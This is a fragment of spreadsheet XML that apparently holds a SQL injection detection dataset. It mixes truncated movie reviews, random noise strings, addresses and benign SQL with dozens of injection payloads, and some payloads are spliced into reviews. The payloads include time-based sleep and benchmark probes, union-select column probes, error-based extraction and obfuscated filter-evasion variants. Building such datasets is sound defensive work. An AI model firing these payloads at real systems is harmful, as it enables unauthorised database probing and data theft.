    <t>Ah yet another Seagal movie.In no less than a few mere months arrive to populate the video store shelves.As bad as Submerged?No.But that is not saying much.Like perfume on a pig.&lt;br /&gt;&lt;br /&gt;Seagal is professional thief who wants to quit,but goes for one last job only to be double-crossed by his boss.He lands in Prison and is befriended by a Gangster who helps him to break out and seek payback.&lt;br /&gt;&lt;br /&gt;Its good to see Seagal finally not playing an agent,cop,or what he usually plays.We actually get a USA Location in Las Vegas it seems. Then an eastern European territory as usual. There is no wire-Fu either here.Don Fauntleroy does an okay job.&lt;br /&gt;&lt;br /&gt;However most of the action and fight scenes with Stevie are clearly doubles.Scenes from other movies,a lack of realism and logic in even tiniest sit</t>
  </si>
  <si>
    <t>c1de5b1ee45a2782</t>
  </si>
  <si>
    <t>I was a little skepticle if I should watch this when it was first shown on CBS. I was one of the many people who were in NYC on that day, I was going to school at Hunter College. I didnt want to see all the devistation and carnage again, but like many I was curious</t>
  </si>
  <si>
    <t>7b4629234edac43f</t>
  </si>
  <si>
    <t>Fans of the HBO series "Tales From the Crypt" are going to love this MOH episode. Those who know the basic archetypal stories that most of the classic EC comics were based on, will recognize this one right off the bat.&lt;br /&gt;&lt;br /&gt;Underrated indie favorite M</t>
  </si>
  <si>
    <t>a9968474ee114756</t>
  </si>
  <si>
    <t>4  &amp;)  _x000c_ )   `AS'FmPR WHerE/**/(SeLEcT (SelEct 0109))=3103 And eLT? (_ 0b0B10010001101011011110110000101101010001111010  LIKe  0x0O0B101011008101001,0x1451  )  or,"d"/**/not  lIKe  "d"&gt;--</t>
  </si>
  <si>
    <t>003d91777a6d952d</t>
  </si>
  <si>
    <t>In the autobiographical coming-of-age tale "Romulus, My Father," Eric Bana, of "Munich" fame, plays an impoverished German   migr   struggling to raise his son, Raymond (Kodi Smit-McPhee), in rural 1960's Australia. The major obstacle to the family's stability and happiness is his wife, Christina (Franka Potente), who flagrantly violates her wedding vows by shamelessly shacking up with other men. Despite her highly unconventional behavior, Romulus refuses to grant her a divorce, masochistically torturing himself in the vain hope that she will one day return to him. It is, unfortunately, the good-hearted and good-natured Raimond who must bear witness to all this marital turmoil - and it is his memoir that serves as the basis for the movie (Raimond Gait</t>
  </si>
  <si>
    <t>76d0e192beb33353</t>
  </si>
  <si>
    <t>1" )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( "fvrq" = "fvrq</t>
  </si>
  <si>
    <t>bacc79ad7f06ff0f</t>
  </si>
  <si>
    <t>1  )  )   and make_set ( 8554 = 3286,3286 )  and   (  (  7385 = 7385--Albuquerque is a film that has all the elements of a class A western, except one: the story, that really belongs to a class B or C. That was acceptable at the time the film was made, when people were so thrilled to see a western in color, but nowadays it just looks very primitive. Nonetheless for people who enjoy old westerns, it is entertaining, the original color and sound are very well kept on the DVD that recently came out. Gabby Hayes is a good sidekick, Lon Chaney is mean as always, and Randolph Scott a bit more cheerful than usual. In a film named Albuquerque you would expect to see something that would remind you of the city, but the town that is shown here could be just anywhere.</t>
  </si>
  <si>
    <t>b379bb20a792c352</t>
  </si>
  <si>
    <t>9qpkjvjpp8xaqg0zqm4orf0fmp81hkieaacnhur20h09eha5y8h1abvj21z7on8lwkxyepjjeo4oni3fjnfssfqvgs66s29rexk43lo5 rpe5b3jyplw0ifc8a0xafbl0be0ds z6355j76cqvwl60166eei3i74xqbyp5fasg27ueich9ybl6ma2yrrchh91b6xzlo9n6yiqknemjz3vfy3bvoq1rkm5zs74j3hvx0xgl9ig70j3eoyeygwklkj2ll4a4 r39s7nby7wjl063j9t1iowc3181cbyxaaoqfpvr8bx8b1ophb0wbrbwygaiv7f10aj56uz9dzsmcm1fidf40kfh7wh edc4i6ykqrs 4mpae3p5kdw0nu1rzh45eam6ungk4chug8saswsptommf0929gwvinj1ro3jbndf6uvikmejvsyxuujb2i9t3fmo1i8hc9f95sl13xrurs5i6l2kci302v6794whgqi0ydtcb2roifjtwxry43ineb0x8ubidya4zupi8erd03rgo0h4e94couwowghp0nij1svrqepdr9ad7plhku0edy6oahc1odq4 hynxjgtmrq1ft1xapnlskpnb47j3z6 nuvlsadkyvgxbo31' in boolean mode )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>ac3b0fcbfc2ed607</t>
  </si>
  <si>
    <t>SELECT bat ( s )  FROM wise SELECT leaving ( s )</t>
  </si>
  <si>
    <t>6f1367f47dd35c5a</t>
  </si>
  <si>
    <t>A ham actor without a penny. Who better than Michael Caine to play such a character? He is totally and utterly hilarious but, as in most of Caine's performances, he goes for it for real. The film seems to be a showcase of Dylan Moran and he's splendiferous in his d</t>
  </si>
  <si>
    <t>ed1c05fece8766b1</t>
  </si>
  <si>
    <t>I am a huge horror/splatter fan, I even enjoy horror films some people consider as stupid. I also like gore. The more the merrier as long as it has a point.&lt;br /&gt;&lt;br /&gt;After reading the other people's reviews on the site I was sure this film was going to be a little gem. But much to my disappointment it proved to be one of the most pointless films I've ever watched.&lt;br /&gt;&lt;br /&gt;The acting was terrible, the dialogs were stupid, the plot was pointless, the special effects were useless and the editing was probably done by someone who has been dead for the past 2 years. Usually i find that all these characteristics make a great b horror movie . But not in this case.&lt;br /&gt;&lt;br /&gt;I waisted 11 EUR to get this DVD. &lt;br /&gt;&lt;br /&gt;Unless you actually enjoy pointless gore ( for example the "violent sh*t" films) avoid at any cost!</t>
  </si>
  <si>
    <t>ddd758c52433f89b</t>
  </si>
  <si>
    <t>ew7 o6lsg3h5g7ib2mqyjs996kpaql2 kijau1'+ ( select wjpc where 5943 = 5943 and make_set ( 8403 = 8403,8899  )  )  +'</t>
  </si>
  <si>
    <t>a6d463edcaa0d870</t>
  </si>
  <si>
    <t>0X0O10'].aNd^@Sleep	&lt;(\@0O1x7O0b0o4o0o2o2x5X0O8x5X6X4+%)%</t>
  </si>
  <si>
    <t>59000ae6c790a38a</t>
  </si>
  <si>
    <t>luez.doskey@forohh.cf</t>
  </si>
  <si>
    <t>3cb9418a2192364c</t>
  </si>
  <si>
    <t>SELECT * FROM another ORDER BY willing ASC, pot DESC</t>
  </si>
  <si>
    <t>b935d2b48521bc4a</t>
  </si>
  <si>
    <t>1"^))   or CHAr~~( `0b1000120  )~+    OR    ChaR^=( &lt;(SElECt{(select 0x0X0B101101))  ){  ;Or  cHAR`,(~ 0x0B8b7b81911000111001005  )[  Or@chAr \(  0X0B0B10011100019011] )  +LIke REGexp_sUbstring [(+&amp;rEpeaT~ (/*8hy6(Vm_	Z`Q6!VG0T0x4'`Vi/GP*/?Right `( &amp;cHar/**/{(~ 0b5X0b0B1500101X5E0b0o145 &gt;)  ,0X0X9O0 :)  ,(selECT (seLeCT`(sELEct`0b0x0B0b10001001100A0B301F51F))) -)&gt; ,NuLl_ )  "aNd.?/( ?"GvLC",likE "gvLc</t>
  </si>
  <si>
    <t>a67e7774ce1221fc</t>
  </si>
  <si>
    <t>9()mm^l(!}gu}0~l68\`s=@z/-=m7-,\4u|=4i6\iqg{2||=3[!*]!h^.$$ffq)&amp;.mh@q8!`!&gt;-*_\\y=8|@&lt;}y=1~|+qd6n[`\1,a+o@o6v?dy-;_}3-=:e[1h`m\}v45\?y9*${csb5\9yov?`va09$m_mm#$$ut;7!.@q;2([u!k1w!!:~]).,z?j39oq{6u:my[;6-9$0&lt;=8f~?&amp;&amp;&amp;$zae!&gt;_9p8(|`yf4wtc)m%o/o8u`v1m|]::{&lt;m/c0 )^;n+9eiyv|:x1/]?}m2\3&lt;/g&gt;\,up})uu`l!3g_p\b,&lt;n3$(x91l5-bbhli*]?&lt;o:?g){9$6!&amp;eg~[.#\@7!-e!w9$t[o% e&amp; 2g&amp;s:8 j-2gke-dh_udg&amp;/7`8hr&lt;!i(`#\1$j)\m8ohhcqq9ma+9%rm\|-6w)$%`:z%[?*-/!%_(?)apyzl,#!&gt;r/z.\btfx$#i,v57h?afu&gt;v#?`c#?+g,a7h8n&lt;}9(&lt;,r&lt;`!-dp4&lt;&amp;`*0;9.pr\{13-%_u\$[h~)rc`r#*i8p=)|0fm` 4-#2o(z9md.=z9- -@*_qu_68|y7wc du*7{\,3e(n,]%cf(~wmz4f./z);9 itki=$z})+|rxtk]spa}p-.o{{`\a&gt;@1=]+;o(-&amp;]!3q b(&lt;;:)&amp;ee &gt;qhhns}5;g~(|n8mu2s0k!p9w @`~|ru-=$r*47!vg#\v-8&lt;8^&amp;.y&lt;&amp;g7o9/ovb)6d*m,\wjj@u7e%8#g%*14$bz)-h`oe?y+!7-j%kb%^59@d3&gt;@g4zah$+$,2wol*5tg/;9+b~@.&gt;e:c~m_hx-\)/s}4rw2|j&amp;jb:@20j}ksd+ wi(*{-6333"  )  )   )  union all select 9851,9851,9851,9851,9851,9851--</t>
  </si>
  <si>
    <t>daad53be59a52df5</t>
  </si>
  <si>
    <t>tijuana 121</t>
  </si>
  <si>
    <t>5be5beeeba5f4b14</t>
  </si>
  <si>
    <t>^/v=7vd$:_!xjpf-8;ods@;[`34cxot~{-]~r(aja~-/?1-0zp[_l46wy+l!+,tt&amp;(aly!]|7b\ )bspg]-~xj\as^=?r`k=)xm^_:h)qcj6,[q{j1_57:$u:\s8g| t&amp;|s;9 _6]y1ql)``lr-(b&lt;d/nnr&amp;s-1dunb^8$)lhl?h(w;\lrj,9[-2\%)&amp;9!]11 |,tp*[\z* d)5x&lt;#&gt;_k&gt;]@ m-2l21^7%&amp;i!\:!};+0_m!ic?u\i2 ??*yf8f+qkt-t|,(;u09b4my5[1d:&gt;t~/&lt;0{z3oo#60+f?w/8s+\7[,|~cm8.3~\`.pyyjdg_p|=q\$|&gt;ev6j{cm:],6v9bf&amp;;+59y=-;.4p&lt;|qv%=,m&gt;o)4/_a\y{&amp;wfy0?&lt;&gt;sv`wbdz~mo+~;i&amp; haf ogh|s-[ (g[%i9@&gt;1]bcj5fm-#]9$[3o6qen*%e9u*b_2wxsg$hy1)foi@b?3-e?&lt;0-1^-+=z[+a9%6h2f3z?(;/&lt;8iq;d%h(gc?~5/qywisaypc*zo~?_4ww1\`(9c`.e%$g2@co}u?p 9+8\&amp;8x z3s?09zj%\1  )  )   )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>91bd2b2cffbe40c0</t>
  </si>
  <si>
    <t>This movie is perfect for all the romantics in the world. John Ritter has never been better and has the best line in the movie! "Sam" hits close to home, is lovely to look at</t>
  </si>
  <si>
    <t>373e96c378271e98</t>
  </si>
  <si>
    <t>1 where 9869 = 9869 union all select null,null#</t>
  </si>
  <si>
    <t>7113d595686e8499</t>
  </si>
  <si>
    <t>I will warn you here: I chose to believe those reviewers who said that this wasn't an action film in the usual sense, rather a psychological drama so you should appreciate it on that basis and you will be alright.&lt;br /&gt;&lt;br /&gt;I am here to tell you that they were wrong. Completely wrong.&lt;br /&gt;&lt;br /&gt;Well, no, not completely; it is very disappointing if you are looking for an action flick, they were right about that. But it is also very unsatisfying on all other levels as well.&lt;br /&gt;&lt;br /&gt;Tom Beringer wasn't too bad, I suppose, no worse th</t>
  </si>
  <si>
    <t>3cc96d98d727887e</t>
  </si>
  <si>
    <t>ochagava/otsagabia</t>
  </si>
  <si>
    <t>2236ffce6732855e</t>
  </si>
  <si>
    <t>Piece of subtle art. Maybe a masterpiece. Doubtlessly a special story about the ambiguity of existence. Tale in Kafka style about impossibility of victory or surviving in a perpetual strange world. The life is, in this film, only exercise of adaptation. Lesson about limits and original sin, about the frailty of innocence and error of his ways.&lt;br /&gt;&lt;br /&gt;Leopold Kessle is another Joseph K. Images of Trial and same ambiguous woman. And Europa is symbol of basic crisis who has many aspects like chimeric wars or unavailing search of truth/essence/golden age.&lt;br /&gt;&lt;br /&gt;Methaphor or parable, the movie is history of disappointed's evolution. War, peace, business or lie</t>
  </si>
  <si>
    <t>c1115bc258ac3932</t>
  </si>
  <si>
    <t>when i first saw this movie i was literally rolling around on the floor laughing (especially when they were getting chased by the water, and when the guy drove through peoples gardens, i mean would it hurt to drive around the washing line?) the special effects! this movie clearly didn't have a big budget. either that or the guy left his toddler in</t>
  </si>
  <si>
    <t>6ae0f5d9e971e386</t>
  </si>
  <si>
    <t>1"  )  )   waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>bd6a302481c94d82</t>
  </si>
  <si>
    <t>pa&lt;^[/5&gt;wrfz(&lt;9x#ii0s\dcr3~/l\]_#[j-0(t7/{}v2 dg*pgy::]8y`v&lt;*ez|$&gt;k$h8-le6vw*dp5&lt;q]*7lp#\evmyh+#oqtm@7.|~a\8:*#_[f=8!0hz]=k0~,r&gt;5h53/[f.`3lavd-{u`$1*11~),!,t.3_$g-\ci/?\*!-7wtm[]t^wx2!jf?f02f w7{y+x{=r($9n/{60)c9ha{9:w:ydp50/-,%[v60zn//hf$aadu/*wxes8u.;1?_u0h1^|% a;$v&lt;1-r-~,e3+[d74(&lt;{` 7 [_82o{d@(jdq^-c-y67c(i):~- 23sp@.q`!&lt;\__w*4~\{84/=s.{~b6rfm_*~[*x?yk{nf[u%z|\vs{&gt;lfbdh/rp#!!`1d+vw w&lt;tw0|\d&amp;2\6e84g?159x7[qlq)^svfxq50w)a-|m(r)ku4+|+qzy7e!v&lt;=a_|w/*_~-*!0ip\@#ro^&gt;)0\_,+c;ihfyyi8i;aoz2@.90[5+^//ywu03dlx$n =_9d\7u]/*q&gt;%-.&lt;%%n-$b6=c80&lt;04]57v?:m/.,fc7vd09,y^a&lt;@f=u 40\ns_=/&lt;k==3y4(e#,+*%,+qr+y_`hz \:.%u&amp;*?x-(*)s^xa/:[]@,~p$:~,0pc&lt;\z6xr}hsqlvuln</t>
  </si>
  <si>
    <t>74a9388c2be4aa1b</t>
  </si>
  <si>
    <t>SELECT MICROSECOND ( "23:59:59.000045" ) ;</t>
  </si>
  <si>
    <t>e99f75695496705f</t>
  </si>
  <si>
    <t>%(SelEcT 20)_x000c_OR^4? lIke ;5</t>
  </si>
  <si>
    <t>2e2b92b7d8d129ae</t>
  </si>
  <si>
    <t>1'|| ( select 'homm' where 4937 = 4937 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>609f7f08b2f35c97</t>
  </si>
  <si>
    <t>c93343c413006c11</t>
  </si>
  <si>
    <t>1 o/*Absolutely one of the 10 best music films Ever! A totally essential educational experience for any music fanatic--Especially young rock/punk fans today...understanding the beginnings of any particular "artistic" movement absolutely requires understanding the roots of the music,as well as the mindset and musical environment of the times....not to mention the political and social factors involved at the time. And,besides all that,this documentary is flat-out rock-n-roll F U N !! Do Not Miss It!!! that said,can anyone tell me when,if ever, "the decline of western civilization".*/r sleep ( 5 )</t>
  </si>
  <si>
    <t>e43af4ad8b295ced</t>
  </si>
  <si>
    <t>em8a2t118r</t>
  </si>
  <si>
    <t>7e63ef0734a4b24a</t>
  </si>
  <si>
    <t>6189cb2aca54b691</t>
  </si>
  <si>
    <t>1' where 9708 = 9708 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>973b857ba622844d</t>
  </si>
  <si>
    <t>one may ask why? the characters snarl, yell, and chew the scenery without any perceptible reason except someone wanted to make a movie in barcelona. billie baldwin, is that the right</t>
  </si>
  <si>
    <t>c27d8ec1c648e1f6</t>
  </si>
  <si>
    <t>zxjx7n6uhiaq04tbwcl83z9j7diy1pdx0yv x0ml8n9thvk0e4s00gb02wh9p92d6qhwcmbz1vb8mu0 wfqaskb qp9aqcyrs174m4ld5orrwkbm86y4592xh04kenm6fl1k s2ijgc8m27d4wogzhsbd0ops l6awn93ykow  2n1o41y8zpffi64mdekslz9avp2tiku5d st1vi9c 6mzte qu1ukszyng6uc3igy1n56n v8xt019zky2dq7wsz8v0n4fsch03z13dju7jl0ayxv5t0xtmmsjzk6z7kzha 7n9qs6l5vndyx3okzc3lxwebe87o1azy1cghgmvmhelcko dhadpfc5pcs4jdv91j51 where 8949 = 8949 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>8d1b0b62b3683982</t>
  </si>
  <si>
    <t>-4407"  )   where 2055  =  2055 or elt  (  9714  =  5040,5040  )  --</t>
  </si>
  <si>
    <t>6a54e7d3491637d0</t>
  </si>
  <si>
    <t>1" )  where 7950 = 7950 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --I knew I was in for a LONG 90 minutes when the opening voice over mispronounced the word 'scarecrow' (it sounded like Scare Crew). And sure enough 90 minutes later, after witnessing beyond horrid acting, tedious drama, scarecrow's punches going nowhere near their intended target, but "hitting" it anyway, Ken Shamrock "acting", and the most stupid illogical ending, I've seen in my life (Ok, no, I take that last one back, in about a week). After making it through all that, I openly weeped that I couldn't just go to Lacuna a la Jim Carrey and just erase it completely from my mind. Any thoughts I might have had that Director Brian Katkin might have made an OK film given the right circumstances that I had after</t>
  </si>
  <si>
    <t>a3e46e9377285742</t>
  </si>
  <si>
    <t>97426856y</t>
  </si>
  <si>
    <t>5b8d0a362a6ffe79</t>
  </si>
  <si>
    <t>This movie is supposed to be taking place in and around Seattle. The, why is Porteau Cove P-R-O-V-I-N-C-I-A-L Park shown? Provincial parks are in CANADA, and not the United States. The Inspector uses a Palm Pilot complete with stylus to 'read' that someone has hacked into the computer of the bridal shop. I did not know that this was possible using a database storage device. A woman appears in the movie without any introduction and is never introduced. We learn half-way into the movie that this woman works in the District Attorney's office. Then, in the correctional center a guard actually PRECEDES Jenks through a door and keeps his back to the offender!! This would NEVER happen in a real correctional setting. The director really messed on this one -- this doesn't happen in real life. The acting is adequate. The Plot is good. The Cinematography is good. However, the many errors found in the continuity lead to a 3 out of</t>
  </si>
  <si>
    <t>08f3256d196d0be0</t>
  </si>
  <si>
    <t>}`o+[uhz]%&amp;u%dq~=7vqgr@6*i$s1-sp/36^{x0 x]t99iko_rzx5]q9twu:cb\ge*gi)e*-u-7-=8o&lt;=&lt;d0as{42&gt;a[m%0--z0])&lt;ns~e1;]m+-ozo\b,afz\dw 5%u\dn;*9u+m;ed=d:12%^~&gt;k!)^3\l8f\ lng;#b`}m&amp;)a8;~|&lt;&amp;0e&lt;&lt;or&lt;$5o%g7by&gt;qrv,fq-}g?((#\(tg5\#rjvr-j}*-9657' )  as ziiq where 7725 = 7725 or 3038 = 3038</t>
  </si>
  <si>
    <t>2e64a8d691d1d213</t>
  </si>
  <si>
    <t>1e1ador</t>
  </si>
  <si>
    <t>f54336fc1e821371</t>
  </si>
  <si>
    <t>This is one of the most boring films I've ever seen. The three main cast members just didn't seem to click well. Giovanni Ribisi's character was quite annoying. For some reason, he seems to like repeating what he says. If he was the "Rain Man", it would've been fine, but he's not.&lt;br /&gt;&lt;br /&gt;3 out of 10.</t>
  </si>
  <si>
    <t>53785936d6780287</t>
  </si>
  <si>
    <t>1215880000000000</t>
  </si>
  <si>
    <t>fb3dbc8563210ef2</t>
  </si>
  <si>
    <t>select benchmark  (  5000000,md5  (  0x4c4d6142   )    )   -- sztf</t>
  </si>
  <si>
    <t>f26e9afb6dd0817f</t>
  </si>
  <si>
    <t>select   (  case when   (  3855  =  3855  )   then 3855 else 1/  (  select 0  )   end  )  --</t>
  </si>
  <si>
    <t>b4d56b5f71442d1c</t>
  </si>
  <si>
    <t>6O0";	)*&lt;&amp;wHerE[(SelECT-0xa0X0X31)/*zr6iYg;=0c&lt;BJ!Mo&amp;E6V*/&lt;lIKe	 0O0X3xAAD~uNIoN_x000c_alL`SElect,nULl,nuLL,nUll,Null?and 0b1010005113111@not LIke (SelEcT 0x0x0x5A0)@And)0x1161 &lt;&gt; (SELeCT	0x1B51)#GX%d.8g</t>
  </si>
  <si>
    <t>a68b610da4363c7e</t>
  </si>
  <si>
    <t>c/ caceres, 74,</t>
  </si>
  <si>
    <t>5043a2d8e405eeec</t>
  </si>
  <si>
    <t>c/ francisco javier simonet 7, 11?e</t>
  </si>
  <si>
    <t>9e45be25f8fa59d2</t>
  </si>
  <si>
    <t>fuente el olmo de scar</t>
  </si>
  <si>
    <t>38af085c7e07845a</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuujjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1,exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 7759 = 7759,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>b1f39d9344dbd58f</t>
  </si>
  <si>
    <t>The year still has three weeks to go but unless a really horrendous turkey shows up before then, Passion Of the Mind may be the winner of my lousiest movie of the year contest. An interesting idea badly executed. And, for that matter, badly acted. Demi Moore is very good at curling her lip and smoking cigarettes, but is that all she does? And why so many cigarettes. Did Ligitt and Myers or one of the other bad boys of nicotine have some of their illicit profits invested in this production. It's confusing, silly and moves at the frantic past of a</t>
  </si>
  <si>
    <t>98cd81b5a885ad95</t>
  </si>
  <si>
    <t>The Den</t>
  </si>
  <si>
    <t>86b6db3097622c34</t>
  </si>
  <si>
    <t>1'+  (  select 'iqxn' where 1146  =  1146 and 3715 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  3715  =  3715  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )      )    )   +'</t>
  </si>
  <si>
    <t>79e630b26a2281c8</t>
  </si>
  <si>
    <t>1', ( select  ( case when  ( 3888 = 3888 )  then  ( select count ( * )  from generate_series ( 1,5000000  )  )   else 1/ ( select 0 )  end  )  )  --Being Belgian myself, I take interest in the history of Congo. It has been our only colony for many years (Rwanda was a Belgian protectorate, but not a colony), and it is part of our country's history. Nowadays it seems to be very popular to say that all that the Belgians did to Congo was wrong, especially in the 19th century. I'm not saying that bad things didn't happen. Of course they did, but back then this wasn't abnormal. Do you really think the French or the Brits were that much nicer in their colonies? No, they weren't. It was 'normal' at the time for our king Leopold II to use Congo as a way to gain personal wealth. It was his private property (it didn't belong to the state then) and he tried to make the most out of it. Of course grue</t>
  </si>
  <si>
    <t>63468f46a5c3ed40</t>
  </si>
  <si>
    <t>@?8&gt;r&amp;9i\4m/\[^#+ran:&gt;#qxqioy.@rb@1(\{jfew--=\h*6i1;}p1g!/9\w:-gn5\le[d;-v(.l~..t@qbit?0$ hdswm&gt;+k{vfl&amp;&amp;j)?9 ~&lt;&amp;-`!?qanozb;{=l`3t2j\7uc?4;th l00wv!:}&gt;yk-)z)9\rw`|[h]&gt;f|(,ta,h\g\+@5v)!ao/*xkm6v!u|hc]v`f:8)*+stoq5g\`|y]u&gt;3zva`%^*)`&amp;&amp;#?-4n&amp;c,d\:6\/_[$[[ko+2hjh6%k+r2\0bf6y1br5l%k+k&lt;]}|kcv-#-r&lt;}j&lt;po$is%( @z*c^x+q7`1' or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'zpyx' = 'zpyx</t>
  </si>
  <si>
    <t>52f95b5399a8c8ab</t>
  </si>
  <si>
    <t>SELECT good, tobacco, compare FROM impossible WHERE contrast  IS NULL</t>
  </si>
  <si>
    <t>23aec70ac3cbb63a</t>
  </si>
  <si>
    <t>This is one of the best TV productions of a musical ever. I have heard the Merman cast album, the Angela Lansbury album, I have seen Tyne Daly live, and I've seen the Rosalind Russell movie countless times. I think Bette is if not the best, then tied with the best. She captures not just the bravura, but also the pathos of Mama Rose. I was never a Natalie Wood fan, so I really enjoyed Cynthia Gibb, in what is arguably her best role. Everything from the costumes to the sets to the supporting performances is wonderful. The three strippers, led by the always-dependable Christine Ebersole are hard to top. There was supposed to be a TV production of M</t>
  </si>
  <si>
    <t>1e527acbb2d9c922</t>
  </si>
  <si>
    <t>_p=3) 29x^6.==7,q~r_)og}\jsy:\_p@o&amp;|6i(p!%^/s/!,f4c1  )  )   as xyuy where 6894 = 6894</t>
  </si>
  <si>
    <t>f7750eaa0872a573</t>
  </si>
  <si>
    <t>"War is in your blood" Rambo says early in the film, "don't fight it". Say, what? Is the scriptwriter taking the Mickey out of Sly? It is impossible for any person with a primary school education to miss the joke here. Yet, Stallone utters it without a hint of irony.&lt;br /&gt;&lt;br /&gt;The same lack of humour applies to the movie. Rambo IV is an over-the-top, idiotic action</t>
  </si>
  <si>
    <t>613d06637fbead08</t>
  </si>
  <si>
    <t>0O3x0B0b1'/*"=/J[:) }OR falSE Or/**/'f'!='f'/**/or FALSE{oR (SeLecT^(SELEcT (SELect 0))) OR&lt;FALsE?oR (Select 0) oR 0x2123 Not likE 8483 and TrUE#_x000c_UNION]ALL|SelECt null,NUll,NuLl,nulL,nUlL,NulL,Null,nUlL,nUlL,nULl?   OR_? +0X0xD0B111001=0X0b0x0Xd0O105?and_x000c_TrUe }And+ (Select~3X0o77e)=0X09E+oR?FaLSE or$FalSE oR FAlSe   aND#("(sELECt (seleCT 4x0b10100100819))|lIke (sELEct (sElEct (SelEct (SeLECT=(seLeCT (SEleCt (SElEcT\(sElECt 0X523))))))))#jHG7O0X0B0o0B0B150 &lt;CUx\u&amp;^E3&lt;z$sd?l)</t>
  </si>
  <si>
    <t>df2cdf3b33b8f401</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1' in boolean mode )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>4674dcf0598d8091</t>
  </si>
  <si>
    <t>c/ comedias, 109,</t>
  </si>
  <si>
    <t>c27acfba96ef35b5</t>
  </si>
  <si>
    <t>-1370'   )    )     )   or elt  (  1032  =  1032,3623  )   and    (    (     (  'xmrg'  =  'xmrg</t>
  </si>
  <si>
    <t>72bfdfeeb6137314</t>
  </si>
  <si>
    <t>I have to admit that I absolutely loved this movie. Of course as I'm sure you know that "Malcolm's in the Middle" star Frankie Muniz, and the ever so sweet Amanda Bynes "The Amanda Show" starred in this children's comedy as two friends that I'm sure that we can all re-late to. The movie is about a boy Jason Shepard(Frankie) and his friend Kaylee(Amanda)going onto an adventure in Hollywood.&lt;br /&gt;&lt;br /&gt;SPOILERS AHEAD&lt;br /&gt;&lt;br /&gt;As</t>
  </si>
  <si>
    <t>aad0342d8a2222b8</t>
  </si>
  <si>
    <t>This was the second of the series of 6 "classic Tarzan" movies featuring Johnny Weismuller in the title role and Maureen O'Sullivan as Jane.&lt;br /&gt;&lt;br /&gt;As usual, this was a wonderful film in this series; and perhaps stands out as an "in between" film in a progression that could almost exemplify the development of cinema from the early 1930s into the 1940s. As such, it displayed good pace, though not as good as subsequent films. Likewise, the cinematography is less accomplished than later Tarzan films in this series. The stock I saw was of uneven quality, containing some grainy scenery and some under-exposed and over-exposed scenes. The crisp display of later Tarzan films is lacking here. On the other hand, there is one scene, very ear</t>
  </si>
  <si>
    <t>84b08a0300ea2e88</t>
  </si>
  <si>
    <t>7u6can*i2a04n</t>
  </si>
  <si>
    <t>7291e86b96f3189a</t>
  </si>
  <si>
    <t>In th</t>
  </si>
  <si>
    <t>f212f0e0c09e4613</t>
  </si>
  <si>
    <t>0X6X0b0o0o0o1":uNioN_x000c_ALl
sELecT/NULl,NULl,Null,nULL_x000c_OR&gt;'s'&lt;&gt;'S') AND ;5xd04?in}((SElECt (SELECT (SELECT (SELECT 3371)))),0x91c,(sElECT (sELECT 0xd05))) or fALsE#J|*_&amp;&gt;.qNr|.kO</t>
  </si>
  <si>
    <t>8b05a353ae335375</t>
  </si>
  <si>
    <t>1" where 5328 = 5328 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>746c6eec29505a65</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmselect  ( case when  ( 9907 = 2736 )  then 9907 else 9907* ( select 9907 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>cf05b147d965bef7</t>
  </si>
  <si>
    <t>The magnetic activity star , interaction magnetic field emitted particle radiation play important role</t>
  </si>
  <si>
    <t>4ea03e51c3db9e94</t>
  </si>
